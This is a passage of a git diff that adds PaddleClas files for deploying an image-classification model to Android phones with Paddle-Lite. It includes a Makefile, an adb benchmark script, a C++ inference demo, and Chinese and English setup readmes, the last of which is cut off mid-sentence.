${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_imgproc.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_core.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libtegra_hal.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibjpeg-turbo.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibwebp.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibpng.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibjasper.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibtiff.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libIlmImf.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libtbb.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libcpufeatures.a + +OPENCV_INCLUDE = -I../../../third_party/${OPENCV_VERSION}/${ARM_PATH}/include + +CXX_INCLUDES = $(INCLUDES) ${OPENCV_INCLUDE} -I$(LITE_ROOT)/cxx/include + +CXX_LIBS = ${OPENCV_LIBS} -L$(LITE_ROOT)/cxx/lib/ -lpaddle_light_api_shared $(SYSTEM_LIBS) + +############################################################### +# How to use one of static libaray: # +# `libpaddle_api_full_bundled.a` # +# `libpaddle_api_light_bundled.a` # +############################################################### +# Note: default use lite's shared library. # +############################################################### +# 1. Comment above line using `libpaddle_light_api_shared.so` +# 2. Undo comment below line using `libpaddle_api_light_bundled.a` + +#CXX_LIBS = $(LITE_ROOT)/cxx/lib/libpaddle_api_light_bundled.a $(SYSTEM_LIBS) + +clas_system: fetch_opencv clas_system.o + $(CC) $(SYSROOT_LINK) $(CXXFLAGS_LINK) clas_system.o -o clas_system $(CXX_LIBS) $(LDFLAGS) + +clas_system.o: image_classfication.cpp + $(CC) $(SYSROOT_COMPLILE) $(CXX_DEFINES) $(CXX_INCLUDES) $(CXX_FLAGS) -o clas_system.o -c image_classfication.cpp + +fetch_opencv: + @ test -d ${THIRD_PARTY_DIR} || mkdir ${THIRD_PARTY_DIR} + @ test -e ${THIRD_PARTY_DIR}/${OPENCV_VERSION}.tar.gz || \ + (echo "fetch opencv libs" && \ + wget -P ${THIRD_PARTY_DIR} https://paddle-inference-dist.bj.bcebos.com/${OPENCV_VERSION}.tar.gz) + @ test -d ${THIRD_PARTY_DIR}/${OPENCV_VERSION} || \ + tar -zxvf ${THIRD_PARTY_DIR}/${OPENCV_VERSION}.tar.gz -C ${THIRD_PARTY_DIR} + + +.PHONY: clean +clean: + rm -f clas_system.o + rm -f clas_system diff --git a/Smart_container/PaddleClas/deploy/lite/benchmark/benchmark.sh b/Smart_container/PaddleClas/deploy/lite/benchmark/benchmark.sh new file mode 100644 index 0000000..591331e --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/benchmark/benchmark.sh @@ -0,0 +1,73 @@ +#!/bin/bash +# ref1: https://github.com/PaddlePaddle/Paddle-Lite/blob/58b2d7dd89/lite/api/benchmark.cc +# ref2: https://paddle-inference-dist.bj.bcebos.com/PaddleLite/benchmark_0/benchmark.sh + +set -e + +# Check input +if [ $# -lt 3 ]; +then + echo "Input error" + echo "Usage:" + echo " sh benchmark.sh " + echo " sh benchmark.sh " + exit +fi + +# Set benchmark params +ANDROID_DIR=/data/local/tmp +BENCHMARK_BIN=$1 +MODELS_DIR=$2 +RESULT_FILENAME=$3 + +WARMUP=10 +REPEATS=30 +IS_RUN_MODEL_OPTIMIZE=false +IS_RUN_QUANTIZED_MODEL=false +NUM_THREADS_LIST=(1 2 4) +MODELS_LIST=$(ls $MODELS_DIR) + +# Check input +if [ $# -gt 3 ]; +then + IS_RUN_MODEL_OPTIMIZE=$4 +fi + +# Adb push benchmark_bin, models +adb push $BENCHMARK_BIN $ANDROID_DIR/benchmark_bin +adb shell chmod +x $ANDROID_DIR/benchmark_bin +adb push $MODELS_DIR $ANDROID_DIR + +# Run benchmark +adb shell "echo 'PaddleLite Benchmark' > $ANDROID_DIR/$RESULT_FILENAME" +for threads in ${NUM_THREADS_LIST[@]}; do + adb shell "echo Threads=$threads Warmup=$WARMUP Repeats=$REPEATS >> $ANDROID_DIR/$RESULT_FILENAME" + for model_name in ${MODELS_LIST[@]}; do + echo "Model=$model_name Threads=$threads" + if [ "$IS_RUN_MODEL_OPTIMIZE" = true ]; + then + adb shell "$ANDROID_DIR/benchmark_bin \ + --model_dir=$ANDROID_DIR/${MODELS_DIR}/$model_name \ + --model_filename=model \ + --param_filename=params \ + --warmup=$WARMUP \ + --repeats=$REPEATS \ + --threads=$threads \ + --result_filename=$ANDROID_DIR/$RESULT_FILENAME" + else + adb shell "$ANDROID_DIR/benchmark_bin \ + --optimized_model_path=$ANDROID_DIR/${MODELS_DIR}/$model_name \ + --warmup=$WARMUP \ + --repeats=$REPEATS \ + --threads=$threads \ + --result_filename=$ANDROID_DIR/$RESULT_FILENAME" + fi + done + adb shell "echo >> $ANDROID_DIR/$RESULT_FILENAME" +done + +# Adb pull benchmark result, show result +adb pull $ANDROID_DIR/$RESULT_FILENAME . +echo "\n--------------------------------------" +cat $RESULT_FILENAME +echo "--------------------------------------" diff --git a/Smart_container/PaddleClas/deploy/lite/config.txt b/Smart_container/PaddleClas/deploy/lite/config.txt new file mode 100644 index 0000000..08cee3d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/config.txt @@ -0,0 +1,6 @@ +clas_model_file ./MobileNetV3_large_x1_0.nb +label_path ./imagenet1k_label_list.txt +resize_short_size 256 +crop_size 224 +visualize 0 +enable_benchmark 0 diff --git a/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp b/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp new file mode 100644 index 0000000..535f3c8 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp @@ -0,0 +1,344 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "paddle_api.h" // NOLINT +#include +#include +#include +#include +#include +#include +#include +#include + +using namespace paddle::lite_api; // NOLINT +using namespace std; + +struct RESULT { + std::string class_name; + int class_id; + float score; +}; + +std::vector PostProcess(const float *output_data, int output_size, + const std::vector &word_labels, + cv::Mat &output_image) { + const int TOPK = 5; + int max_indices[TOPK]; + double max_scores[TOPK]; + for (int i = 0; i < TOPK; i++) { + max_indices[i] = 0; + max_scores[i] = 0; + } + for (int i = 0; i < output_size; i++) { + float score = output_data[i]; + int index = i; + for (int j = 0; j < TOPK; j++) { + if (score > max_scores[j]) { + index += max_indices[j]; + max_indices[j] = index - max_indices[j]; + index -= max_indices[j]; + score += max_scores[j]; + max_scores[j] = score - max_scores[j]; + score -= max_scores[j]; + } + } + } + + std::vector results(TOPK); + for (int i = 0; i < results.size(); i++) { + results[i].class_name = "Unknown"; + if (max_indices[i] >= 0 && max_indices[i] < word_labels.size()) { + results[i].class_name = word_labels[max_indices[i]]; + } + results[i].score = max_scores[i]; + results[i].class_id = max_indices[i]; + cv::putText(output_image, + "Top" + std::to_string(i + 1) + "." + results[i].class_name + + ":" + std::to_string(results[i].score), + cv::Point2d(5, i * 18 + 20), cv::FONT_HERSHEY_PLAIN, 1, + cv::Scalar(51, 255, 255)); + } + return results; +} + +// fill tensor with mean and scale and trans layout: nhwc -> nchw, neon speed up +void NeonMeanScale(const float *din, float *dout, int size, + const std::vector mean, + const std::vector scale) { + if (mean.size() != 3 || scale.size() != 3) { + std::cerr << "[ERROR] mean or scale size must equal to 3\n"; + exit(1); + } + float32x4_t vmean0 = vdupq_n_f32(mean[0]); + float32x4_t vmean1 = vdupq_n_f32(mean[1]); + float32x4_t vmean2 = vdupq_n_f32(mean[2]); + float32x4_t vscale0 = vdupq_n_f32(scale[0]); + float32x4_t vscale1 = vdupq_n_f32(scale[1]); + float32x4_t vscale2 = vdupq_n_f32(scale[2]); + + float *dout_c0 = dout; + float *dout_c1 = dout + size; + float *dout_c2 = dout + size * 2; + + int i = 0; + for (; i < size - 3; i += 4) { + float32x4x3_t vin3 = vld3q_f32(din); + float32x4_t vsub0 = vsubq_f32(vin3.val[0], vmean0); + float32x4_t vsub1 = vsubq_f32(vin3.val[1], vmean1); + float32x4_t vsub2 = vsubq_f32(vin3.val[2], vmean2); + float32x4_t vs0 = vmulq_f32(vsub0, vscale0); + float32x4_t vs1 = vmulq_f32(vsub1, vscale1); + float32x4_t vs2 = vmulq_f32(vsub2, vscale2); + vst1q_f32(dout_c0, vs0); + vst1q_f32(dout_c1, vs1); + vst1q_f32(dout_c2, vs2); + + din += 12; + dout_c0 += 4; + dout_c1 += 4; + dout_c2 += 4; + } + for (; i < size; i++) { + *(dout_c0++) = (*(din++) - mean[0]) * scale[0]; + *(dout_c1++) = (*(din++) - mean[1]) * scale[1]; + *(dout_c2++) = (*(din++) - mean[2]) * scale[2]; + } +} + +cv::Mat ResizeImage(const cv::Mat &img, const int &resize_short_size) { + int w = img.cols; + int h = img.rows; + + cv::Mat resize_img; + + float ratio = 1.f; + if (h < w) { + ratio = float(resize_short_size) / float(h); + } else { + ratio = float(resize_short_size) / float(w); + } + int resize_h = round(float(h) * ratio); + int resize_w = round(float(w) * ratio); + + cv::resize(img, resize_img, cv::Size(resize_w, resize_h)); + return resize_img; +} + +cv::Mat CenterCropImg(const cv::Mat &img, const int &crop_size) { + int resize_w = img.cols; + int resize_h = img.rows; + int w_start = int((resize_w - crop_size) / 2); + int h_start = int((resize_h - crop_size) / 2); + cv::Rect rect(w_start, h_start, crop_size, crop_size); + cv::Mat crop_img = img(rect); + return crop_img; +} + +std::vector +RunClasModel(std::shared_ptr predictor, const cv::Mat &img, + const std::map &config, + const std::vector &word_labels, double &cost_time) { + // Read img + int resize_short_size = stoi(config.at("resize_short_size")); + int crop_size = stoi(config.at("crop_size")); + int visualize = stoi(config.at("visualize")); + + cv::Mat resize_image = ResizeImage(img, resize_short_size); + + cv::Mat crop_image = CenterCropImg(resize_image, crop_size); + + cv::Mat img_fp; + double e = 1.0 / 255.0; + crop_image.convertTo(img_fp, CV_32FC3, e); + + // Prepare input data from image + std::unique_ptr input_tensor(std::move(predictor->GetInput(0))); + input_tensor->Resize({1, 3, img_fp.rows, img_fp.cols}); + auto *data0 = input_tensor->mutable_data(); + + std::vector mean = {0.485f, 0.456f, 0.406f}; + std::vector scale = {1 / 0.229f, 1 / 0.224f, 1 / 0.225f}; + const float *dimg = reinterpret_cast(img_fp.data); + NeonMeanScale(dimg, data0, img_fp.rows * img_fp.cols, mean, scale); + + auto start = std::chrono::system_clock::now(); + // Run predictor + predictor->Run(); + + // Get output and post process + std::unique_ptr output_tensor( + std::move(predictor->GetOutput(0))); + auto *output_data = output_tensor->data(); + auto end = std::chrono::system_clock::now(); + auto duration = + std::chrono::duration_cast(end - start); + cost_time = double(duration.count()) * + std::chrono::microseconds::period::num / + std::chrono::microseconds::period::den; + + int output_size = 1; + for (auto dim : output_tensor->shape()) { + output_size *= dim; + } + + cv::Mat output_image; + auto results = + PostProcess(output_data, output_size, word_labels, output_image); + + if (visualize) { + std::string output_image_path = "./clas_result.png"; + cv::imwrite(output_image_path, output_image); + std::cout << "save output image into " << output_image_path << std::endl; + } + + return results; +} + +std::shared_ptr LoadModel(std::string model_file) { + MobileConfig config; + config.set_model_from_file(model_file); + + std::shared_ptr predictor = + CreatePaddlePredictor(config); + return predictor; +} + +std::vector split(const std::string &str, + const std::string &delim) { + std::vector res; + if ("" == str) + return res; + char *strs = new char[str.length() + 1]; + std::strcpy(strs, str.c_str()); + + char *d = new char[delim.length() + 1]; + std::strcpy(d, delim.c_str()); + + char *p = std::strtok(strs, d); + while (p) { + string s = p; + res.push_back(s); + p = std::strtok(NULL, d); + } + + return res; +} + +std::vector ReadDict(std::string path) { + std::ifstream in(path); + std::string filename; + std::string line; + std::vector m_vec; + if (in) { + while (getline(in, line)) { + m_vec.push_back(line); + } + } else { + std::cout << "no such file" << std::endl; + } + return m_vec; +} + +std::map LoadConfigTxt(std::string config_path) { + auto config = ReadDict(config_path); + + std::map dict; + for (int i = 0; i < config.size(); i++) { + std::vector res = split(config[i], " "); + dict[res[0]] = res[1]; + } + return dict; +} + +void PrintConfig(const std::map &config) { + std::cout << "=======PaddleClas lite demo config======" << std::endl; + for (auto iter = config.begin(); iter != config.end(); iter++) { + std::cout << iter->first << " : " << iter->second << std::endl; + } + std::cout << "=======End of PaddleClas lite demo config======" << std::endl; +} + +std::vector LoadLabels(const std::string &path) { + std::ifstream file; + std::vector labels; + file.open(path); + while (file) { + std::string line; + std::getline(file, line); + std::string::size_type pos = line.find(" "); + if (pos != std::string::npos) { + line = line.substr(pos); + } + labels.push_back(line); + } + file.clear(); + file.close(); + return labels; +} + +int main(int argc, char **argv) { + if (argc < 3) { + std::cerr << "[ERROR] usage: " << argv[0] << " config_path img_path\n"; + exit(1); + } + + std::string config_path = argv[1]; + std::string img_path = argv[2]; + + // load config + auto config = LoadConfigTxt(config_path); + PrintConfig(config); + + double elapsed_time = 0.0; + int warmup_iter = 10; + + bool enable_benchmark = bool(stoi(config.at("enable_benchmark"))); + int total_cnt = enable_benchmark ? 1000 : 1; + + std::string clas_model_file = config.at("clas_model_file"); + std::string label_path = config.at("label_path"); + + // Load Labels + std::vector word_labels = LoadLabels(label_path); + + auto clas_predictor = LoadModel(clas_model_file); + for (int j = 0; j < total_cnt; ++j) { + cv::Mat srcimg = cv::imread(img_path, cv::IMREAD_COLOR); + cv::cvtColor(srcimg, srcimg, cv::COLOR_BGR2RGB); + + double run_time = 0; + std::vector results = + RunClasModel(clas_predictor, srcimg, config, word_labels, run_time); + + std::cout << "===clas result for image: " << img_path << "===" << std::endl; + for (int i = 0; i < results.size(); i++) { + std::cout << "\t" + << "Top-" << i + 1 << ", class_id: " << results[i].class_id + << ", class_name: " << results[i].class_name + << ", score: " << results[i].score << std::endl; + } + if (j >= warmup_iter) { + elapsed_time += run_time; + std::cout << "Current image path: " << img_path << std::endl; + std::cout << "Current time cost: " << run_time << " s, " + << "average time cost in all: " + << elapsed_time / (j + 1 - warmup_iter) << " s." << std::endl; + } else { + std::cout << "Current time cost: " << run_time << " s." << std::endl; + } + } + + return 0; +} diff --git a/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png b/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png new file mode 100644 index 0000000..b778f15 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png differ diff --git a/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg b/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg new file mode 100644 index 0000000..6eb5b71 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg differ diff --git a/Smart_container/PaddleClas/deploy/lite/prepare.sh b/Smart_container/PaddleClas/deploy/lite/prepare.sh new file mode 100644 index 0000000..ed1f13a --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/prepare.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +if [ $# != 1 ] ; then +echo "USAGE: $0 your_inference_lite_lib_path" +exit 1; +fi + +mkdir -p $1/demo/cxx/clas/debug/ +cp ../../ppcls/utils/imagenet1k_label_list.txt $1/demo/cxx/clas/debug/ +cp -r ./* $1/demo/cxx/clas/ +cp ./config.txt $1/demo/cxx/clas/debug/ +cp ./imgs/tabby_cat.jpg $1/demo/cxx/clas/debug/ + +echo "Prepare Done" diff --git a/Smart_container/PaddleClas/deploy/lite/readme.md b/Smart_container/PaddleClas/deploy/lite/readme.md new file mode 100644 index 0000000..176e62c --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/readme.md @@ -0,0 +1,265 @@ +# 端侧部署 + +本教程将介绍基于[Paddle Lite](https://github.com/PaddlePaddle/Paddle-Lite) 在移动端部署PaddleClas分类模型的详细步骤。 + +Paddle Lite是飞桨轻量化推理引擎,为手机、IOT端提供高效推理能力,并广泛整合跨平台硬件,为端侧部署及应用落地问题提供轻量化的部署方案。如果希望直接测试速度,可以参考[Paddle-Lite移动端benchmark测试教程](../../docs/zh_CN/extension/paddle_mobile_inference.md)。 + + +## 1. 准备环境 + +### 运行准备 +- 电脑(编译Paddle Lite) +- 安卓手机(armv7或armv8) + +### 1.1 准备交叉编译环境 +交叉编译环境用于编译 Paddle Lite 和 PaddleClas 的C++ demo。 +支持多种开发环境,不同开发环境的编译流程请参考对应文档。 + +1. [Docker](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#docker) +2. [Linux](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#linux) +3. [MAC OS](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#mac-os) + +### 1.2 准备预测库 + +预测库有两种获取方式: +1. [建议]直接下载,预测库下载链接如下: + |平台|预测库下载链接| + |-|-| + |Android|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv7.gcc.c++_static.with_extra.with_cv.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv8.gcc.c++_static.with_extra.with_cv.tar.gz)| + |iOS|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv7.with_cv.with_extra.tiny_publish.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv8.with_cv.with_extra.tiny_publish.tar.gz)| + + **注**: + 1. 如果是从 Paddle-Lite [官方文档](https://paddle-lite.readthedocs.io/zh/latest/quick_start/release_lib.html#android-toolchain-gcc)下载的预测库, + 注意选择`with_extra=ON,with_cv=ON`的下载链接。 + 2. 如果使用量化的模型部署在端侧,建议使用Paddle-Lite develop分支编译预测库。 + +2. 编译Paddle-Lite得到预测库,Paddle-Lite的编译方式如下: +```shell +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +# 如果使用编译方式,建议使用develop分支编译预测库 +git checkout develop +./lite/tools/build_android.sh --arch=armv8 --with_cv=ON --with_extra=ON +``` + +**注意**:编译Paddle-Lite获得预测库时,需要打开`--with_cv=ON --with_extra=ON`两个选项,`--arch`表示`arm`版本,这里指定为armv8,更多编译命令介绍请参考[链接](https://paddle-lite.readthedocs.io/zh/latest/user_guides/Compile/Android.html#id2)。 + +直接下载预测库并解压后,可以得到`inference_lite_lib.android.armv8/`文件夹,通过编译Paddle-Lite得到的预测库位于`Paddle-Lite/build.lite.android.armv8.gcc/inference_lite_lib.android.armv8/`文件夹下。 +预测库的文件目录如下: + +``` +inference_lite_lib.android.armv8/ +|-- cxx C++ 预测库和头文件 +| |-- include C++ 头文件 +| | |-- paddle_api.h +| | |-- paddle_image_preprocess.h +| | |-- paddle_lite_factory_helper.h +| | |-- paddle_place.h +| | |-- paddle_use_kernels.h +| | |-- paddle_use_ops.h +| | `-- paddle_use_passes.h +| `-- lib C++预测库 +| |-- libpaddle_api_light_bundled.a C++静态库 +| `-- libpaddle_light_api_shared.so C++动态库 +|-- java Java预测库 +| |-- jar +| | `-- PaddlePredictor.jar +| |-- so +| | `-- libpaddle_lite_jni.so +| `-- src +|-- demo C++和Java示例代码 +| |-- cxx C++ 预测库demo +| `-- java Java 预测库demo +``` + +## 2 开始运行 + +### 2.1 模型优化 + +Paddle-Lite 提供了多种策略来自动优化原始的模型,其中包括量化、子图融合、混合调度、Kernel优选等方法,使用Paddle-Lite的`opt`工具可以自动对inference模型进行优化,目前支持两种优化方式,优化后的模型更轻量,模型运行速度更快。 + +**注意**:如果已经准备好了 `.nb` 结尾的模型文件,可以跳过此步骤。 + +#### 2.1.1 [建议]pip安装paddlelite并进行转换 + +Python下安装 `paddlelite`,目前最高支持`Python3.7`。 +**注意**:`paddlelite`whl包版本必须和预测库版本对应。 + +```shell +pip install paddlelite==2.8 +``` + +之后使用`paddle_lite_opt`工具可以进行inference模型的转换。`paddle_lite_opt`的部分参数如下 + +|选项|说明| +|-|-| +|--model_dir|待优化的PaddlePaddle模型(非combined形式)的路径| +|--model_file|待优化的PaddlePaddle模型(combined形式)的网络结构文件路径| +|--param_file|待优化的PaddlePaddle模型(combined形式)的权重文件路径| +|--optimize_out_type|输出模型类型,目前支持两种类型:protobuf和naive_buffer,其中naive_buffer是一种更轻量级的序列化/反序列化实现。若您需要在mobile端执行模型预测,请将此选项设置为naive_buffer。默认为protobuf| +|--optimize_out|优化模型的输出路径| +|--valid_targets|指定模型可执行的backend,默认为arm。目前可支持x86、arm、opencl、npu、xpu,可以同时指定多个backend(以空格分隔),Model Optimize Tool将会自动选择最佳方式。如果需要支持华为NPU(Kirin 810/990 Soc搭载的达芬奇架构NPU),应当设置为npu, arm| +|--record_tailoring_info|当使用 根据模型裁剪库文件 功能时,则设置该选项为true,以记录优化后模型含有的kernel和OP信息,默认为false| + +`--model_file`表示inference模型的model文件地址,`--param_file`表示inference模型的param文件地址;`optimize_out`用于指定输出文件的名称(不需要添加`.nb`的后缀)。直接在命令行中运行`paddle_lite_opt`,也可以查看所有参数及其说明。 + + +#### 2.1.2 源码编译Paddle-Lite生成opt工具 + +模型优化需要Paddle-Lite的`opt`可执行文件,可以通过编译Paddle-Lite源码获得,编译步骤如下: +```shell +# 如果准备环境时已经clone了Paddle-Lite,则不用重新clone Paddle-Lite +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +git checkout develop +# 启动编译 +./lite/tools/build.sh build_optimize_tool +``` + +编译完成后,`opt`文件位于`build.opt/lite/api/`下,可通过如下方式查看`opt`的运行选项和使用方式; +```shell +cd build.opt/lite/api/ +./opt +``` + +`opt`的使用方式与参数与上面的`paddle_lite_opt`完全一致。 + + + +#### 2.1.3 转换示例 + +下面以PaddleClas的 `MobileNetV3_large_x1_0` 模型为例,介绍使用`paddle_lite_opt`完成预训练模型到inference模型,再到Paddle-Lite优化模型的转换。 + +```shell +# 进入PaddleClas根目录 +cd PaddleClas_root_path + +# 下载并解压inference模型 +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/MobileNetV3_large_x1_0_infer.tar +tar -xf MobileNetV3_large_x1_0_infer.tar + +# 将inference模型转化为Paddle-Lite优化模型 +paddle_lite_opt --model_file=./MobileNetV3_large_x1_0_infer/inference.pdmodel --param_file=./MobileNetV3_large_x1_0_infer/inference.pdiparams --optimize_out=./MobileNetV3_large_x1_0 +``` + +最终在当前文件夹下生成`MobileNetV3_large_x1_0.nb`的文件。 + +**注意**:`--optimize_out` 参数为优化后模型的保存路径,无需加后缀`.nb`;`--model_file` 参数为模型结构信息文件的路径,`--param_file` 参数为模型权重信息文件的路径,请注意文件名。 + + +### 2.2 与手机联调 + +首先需要进行一些准备工作。 +1. 准备一台arm8的安卓手机,如果编译的预测库和opt文件是armv7,则需要arm7的手机,并修改Makefile中`ARM_ABI = arm7`。 +2. 电脑上安装ADB工具,用于调试。 ADB安装方式如下: + + 3.1. MAC电脑安装ADB: + + ```shell + brew cask install android-platform-tools + ``` + 3.2. Linux安装ADB + ```shell + sudo apt update + sudo apt install -y wget adb + ``` + 3.3. Window安装ADB + + win上安装需要去谷歌的安卓平台下载ADB软件包进行安装:[链接](https://developer.android.com/studio) + +4. 手机连接电脑后,开启手机`USB调试`选项,选择`文件传输`模式,在电脑终端中输入: + +```shell +adb devices +``` +如果有device输出,则表示安装成功,如下所示: +``` +List of devices attached +744be294 device +``` + +5. 准备优化后的模型、预测库文件、测试图像和类别映射文件。 + +```shell +cd PaddleClas_root_path +cd deploy/lite/ + +# 运行prepare.sh +# prepare.sh 会将预测库文件、测试图像和使用的字典文件放置在预测库中的demo/cxx/clas文件夹下 +sh prepare.sh /{lite prediction library path}/inference_lite_lib.android.armv8 + +# 进入lite demo的工作目录 +cd /{lite prediction library path}/inference_lite_lib.android.armv8/ +cd demo/cxx/clas/ + +# 将C++预测动态库so文件复制到debug文件夹中 +cp ../../../cxx/lib/libpaddle_light_api_shared.so ./debug/ +``` + +`prepare.sh` 以 `PaddleClas/deploy/lite/imgs/tabby_cat.jpg` 作为测试图像,将测试图像复制到`demo/cxx/clas/debug/` 文件夹下。 +将 `paddle_lite_opt` 工具优化后的模型文件放置到 `/{lite prediction library path}/inference_lite_lib.android.armv8/demo/cxx/clas/debug/` 文件夹下。本例中,使用[2.1.3](#2.1.3)生成的 `MobileNetV3_large_x1_0.nb` 模型文件。 + +执行完成后,clas文件夹下将有如下文件格式: + +``` +demo/cxx/clas/ +|-- debug/ +| |--MobileNetV3_large_x1_0.nb 优化后的分类器模型文件 +| |--tabby_cat.jpg 待测试图像 +| |--imagenet1k_label_list.txt 类别映射文件 +| |--libpaddle_light_api_shared.so C++预测库文件 +| |--config.txt 分类预测超参数配置 +|-- config.txt 分类预测超参数配置 +|-- image_classfication.cpp 图像分类代码文件 +|-- Makefile 编译文件 +``` + +#### 注意: +* 上述文件中,`imagenet1k_label_list.txt` 是ImageNet1k数据集的类别映射文件,如果使用自定义的类别,需要更换该类别映射文件。 + +* `config.txt` 包含了分类器的超参数,如下: + +```shell +clas_model_file ./MobileNetV3_large_x1_0.nb # 模型文件地址 +label_path ./imagenet1k_label_list.txt # 类别映射文本文件 +resize_short_size 256 # resize之后的短边边长 +crop_size 224 # 裁剪后用于预测的边长 +visualize 0 # 是否进行可视化,如果选择的话,会在当前文件夹下生成名为clas_result.png的图像文件。 +``` + +5. 启动调试,上述步骤完成后就可以使用ADB将文件夹 `debug/` push到手机上运行,步骤如下: + +```shell +# 执行编译,得到可执行文件clas_system +make -j + +# 将编译得到的可执行文件移动到debug文件夹中 +mv clas_system ./debug/ + +# 将上述debug文件夹push到手机上 +adb push debug /data/local/tmp/ + +adb shell +cd /data/local/tmp/debug +export LD_LIBRARY_PATH=/data/local/tmp/debug:$LD_LIBRARY_PATH + +# clas_system可执行文件的使用方式为: +# ./clas_system 配置文件路径 测试图像路径 +./clas_system ./config.txt ./tabby_cat.jpg +``` + +如果对代码做了修改,则需要重新编译并push到手机上。 + +运行效果如下: + +
+ +
+ + +## FAQ +Q1:如果想更换模型怎么办,需要重新按照流程走一遍吗? +A1:如果已经走通了上述步骤,更换模型只需要替换 `.nb` 模型文件即可,同时要注意修改下配置文件中的 `.nb` 文件路径以及类别映射文件(如有必要)。 + +Q2:换一个图测试怎么做? +A2:替换 debug 下的测试图像为你想要测试的图像,使用 ADB 再次 push 到手机上即可。 diff --git a/Smart_container/PaddleClas/deploy/lite/readme_en.md b/Smart_container/PaddleClas/deploy/lite/readme_en.md new file mode 100644 index 0000000..1027c78 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/readme_en.md @@ -0,0 +1,257 @@ + +# Tutorial of PaddleClas Mobile Deployment + +This tutorial will introduce how to use [Paddle-Lite](https://github.com/PaddlePaddle/Paddle-Lite) to deploy PaddleClas models on mobile phones. + +Paddle-Lite is a lightweight inference engine for PaddlePaddle. It provides efficient inference capabilities for mobile phones and IoTs, and extensively integrates cross-platform hardware to provide lightweight deployment solutions for mobile-side deployment issues. + +If you only want to test speed, please refer to [The tutorial of Paddle-Lite mobile-side benchmark test](../../docs/zh_CN/extension/paddle_mobile_inference.md). + +## 1. Preparation + +- Computer (for compiling Paddle-Lite) +- Mobile phone (arm7 or arm8) + +## 2. Build Paddle-Lite library + +The cross-compilation environment is used to compile the C++ demos of Paddle-Lite and PaddleClas. + +For the detailed compilation directions of different development environments, please refer to the corresponding documents. + +1. [Docker](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#docker) +2. [Linux](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#linux) +3. [macOS](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#mac-os) + +## 3. Download inference library for Android or iOS + +|Platform|Inference Library Download Link| +|-|-| +|Android|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv7.gcc.c++_static.with_extra.with_cv.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv8.gcc.c++_static.with_extra.with_cv.tar.gz)| +|iOS|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv7.with_cv.with_extra.tiny_publish.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv8.with_cv.with_extra.tiny_publish.tar.gz)| + +**NOTE**: + +1. If you download the inference library from [Paddle-Lite official document](https://paddle-lite.readthedocs.io/zh/latest/quick_start/release_lib.html#android-toolchain-gcc), please choose `with_extra=ON` , `with_cv=ON` . + +2. It is recommended to build inference library using [Paddle-Lite](https://github.com/PaddlePaddle/Paddle-Lite) develop branch if you want to deploy the [quantitative](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/quantization/README_en.md) 